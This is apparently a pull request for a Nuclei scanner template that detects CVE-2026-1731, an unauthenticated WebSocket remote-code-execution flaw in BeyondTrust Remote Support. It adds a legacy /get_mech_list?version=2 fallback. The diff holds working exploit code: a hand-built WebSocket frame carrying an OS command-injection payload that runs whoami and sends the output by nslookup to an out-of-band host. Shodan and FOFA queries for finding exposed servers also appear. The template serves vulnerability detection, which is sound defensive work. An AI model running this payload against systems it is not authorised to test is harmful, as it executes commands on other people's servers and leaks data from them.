### PR TITLE
fix(CVE-2026-1731): add legacy version support for older BeyondTrust builds

### DIFF
--- a/javascript/cves/2026/CVE-2026-1731.yaml
+++ b/javascript/cves/2026/CVE-2026-1731.yaml
@@ -2,14 +2,22 @@ id: CVE-2026-1731
 
 info:
   name: BeyondTrust Remote Support - Unauthenticated WebSocket RCE
-  author: attackerkb,hacktron,pdteam
+  author: attackerkb,hacktron,pdteam,hevnsnt
   severity: critical
   description: |
-    BeyondTrust Remote Support is vulnerable to unauthenticated remote code execution via the WebSocket endpoint /nw. An attacker can extract the company identifier from the /get_mech_list endpoint and use it to connect to the WebSocket service, then inject OS commands through the binary WebSocket payload that are executed on the server.
+    BeyondTrust Remote Support is vulnerable to unauthenticated remote code execution via the WebSocket endpoint /nw.
+    An attacker can extract the company identifier from the /get_mech_list endpoint and use it to connect to the
+    WebSocket service, then inject OS commands through the binary WebSocket payload that are executed on the server.
+
+    This template handles both legacy and modern response formats from /get_mech_list:
+    - version=2 returns semicolon-delimited key=value pairs (older builds, e.g. v19.x)
+    - version=3 returns JSON with default_company field (newer builds, e.g. v21.x)
   impact: |
-    Remote attackers can execute arbitrary commands on the system without authentication, potentially leading to full system compromise.
+    Remote attackers can execute arbitrary commands on the system without authentication, potentially leading to
+    full system compromise.
   remediation: |
-    Apply the latest security patches provided by BeyondTrust for Remote Support and Privileged Remote Access products.
+    Upgrade to BeyondTrust Remote Support version 21.3+ or Privileged Remote Access version 22.1+.
+    See vendor advisory BT26-02.
   reference:
     - https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
     - https://www.hacktron.ai/blog/cve-2026-1731-beyondtrust-remote-support-rce
@@ -21,15 +29,21 @@ info:
     cwe-id: CWE-78
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: beyondtrust
     product: remote_support
     shodan-query: http.html:"BeyondTrust"
+    fofa-query: body="BeyondTrust" && body="Remote Support"
   tags: cve,cve2026,beyondtrust,rce,websocket,oob,js,vuln,vkev,kev
 
-flow: http(1) && javascript(1)
+# Try version=3 (newer JSON format) first, fall back to version=2 (legacy key=value format)
+flow: |
+  http(1);
+  if (!template.company) { http(2); }
+  if (template.company) { javascript(1); }
 
 http:
+  # Request 1: Modern format (version=3, JSON response with "default_company")
   - raw:
       - |
         GET /get_mech_list?version=3 HTTP/1.1
@@ -40,7 +54,7 @@ http:
       - type: word
         part: body
         words:
-          - "company"
+          - "default_company"
         internal: true
 
     extractors:
@@ -52,12 +66,38 @@ http:
           - '"default_company"\s*:\s*"([^"]+)"'
         internal: true
 
+  # Request 2: Legacy format (version=2, semicolon-delimited key=value pairs)
+  # Older builds (e.g. v19.x) return empty body for version=3 but respond to version=2
+  # with format: "0 Successful\nmechs=...;company=<id>;product=ingredi"
+  - raw:
+      - |
+        GET /get_mech_list?version=2 HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "company="
+        internal: true
+
+    extractors:
+      - type: regex
+        name: company
+        part: body
+        group: 1
+        regex:
+          - 'company=([^;\s]+)'
+        internal: true
+
 javascript:
   - code: |
       const net = require("nuclei/net");
       const nb = require("nuclei/bytes");
 
-      let address = Host + ":443";
+      let port = "443";
+      let address = Host + ":" + port;
       let conn;
       try { conn = net.OpenTLS('tcp', address); } catch(e) { conn = net.Open('tcp', address); }
 
@@ -77,7 +117,7 @@ javascript:
 
       let result = "";
       if (resp.indexOf("101") !== -1) {
-        // Step 2: Build binary WebSocket frame with command injection payload
+        // Step 2: Build binary WebSocket frame with OOB command injection payload
         let payload = "hax[$(/usr/bin/nslookup $(whoami)." + oob + ")]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n";
 
         let buf = new nb.Buffer();
@@ -85,12 +125,7 @@ javascript:
         let payloadHex = buf.Hex();
         let payloadLen = buf.Len();
 
-        // WebSocket frame structure:
-        // Byte 1: FIN=1 + RSV=000 + Opcode=0010 (binary) = 0x82
-        // Byte 2: MASK=1 + payload length
-        // If length < 126: single byte (7-bit length)
-        // If length 126-65535: byte=126, then 2-byte big-endian length
-        // Masking key: 00000000 (no-op XOR mask)
+        // WebSocket binary frame: FIN=1, Opcode=0x02 (binary), MASK=1
         let frameHeader = "82";
         if (payloadLen < 126) {
           frameHeader += (0x80 | payloadLen).toString(16).padStart(2, '0');
@@ -99,7 +134,7 @@ javascript:
           frameHeader += ((payloadLen >> 8) & 0xFF).toString(16).padStart(2, '0');
           frameHeader += (payloadLen & 0xFF).toString(16).padStart(2, '0');
         }
-        frameHeader += "00000000";
+        frameHeader += "00000000"; // masking key (no-op XOR)
         let frameHex = frameHeader + payloadHex;
 
         conn.SendHex(frameHex);
@@ -124,4 +159,3 @@ javascript:
         part: interactsh_request
         regex:
           - '([a-zA-Z0-9_-]+)\.[a-z0-9]{20,}\.'
-# digest: 490a004630440220501ba6f79a3b0bb4b9b354bb4cb7eee56d4c09f1cfefa06bfca6c10372c84e9e022050c33955685c479910770f5b6d89401703555221428d6cdc7d66359b5b386d7a:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Summary

- The existing CVE-2026-1731 template only queries `/get_mech_list?version=3`, which returns JSON with a `default_company` field on newer BeyondTrust builds
- Older builds (pre-21.x, e.g. v19.x) return an **empty body** for `version=3` but respond to `version=2` with semicolon-delimited key=value pairs containing the company identifier
- This causes a **false negative** on all vulnerable installations running older versions

## Changes

- Add fallback HTTP request for `/get_mech_list?version=2` (legacy key=value format)
- Update flow logic: try `version=3` first, fall back to `version=2`, then proceed to WebSocket verification
- Add regex extractor for legacy `company=<value>` format
- Tighten `version=3` word matcher from `"company"` to `"default_company"` to prevent false matches
- Update `max-request` from 2 to 3
- Add `fofa-query` to metadata
- Improve description and remediation with specific patched version numbers

## Testing

| Target | Version | Original Template | Updated Template |
|--------|---------|-------------------|------------------|
| BeyondTrust RS v19.2.4 | Legacy (pre-21.x) | **False negative** (empty body on version=3) | Detected via version=2 fallback |
| BeyondTrust RS v21.x+ | Modern | Detected via version=3 | Detected via version=3 (no regression) |

```
# Original - misses older versions
$ nuclei -t CVE-2026-1731.yaml -u https://<target>
[INF] No results found.

# Updated - catches both old and new
$ nuclei -t CVE-2026-1731.yaml -u https://<target>
[CVE-2026-1731] [javascript] [critical] <target> ["<company_id>"]
```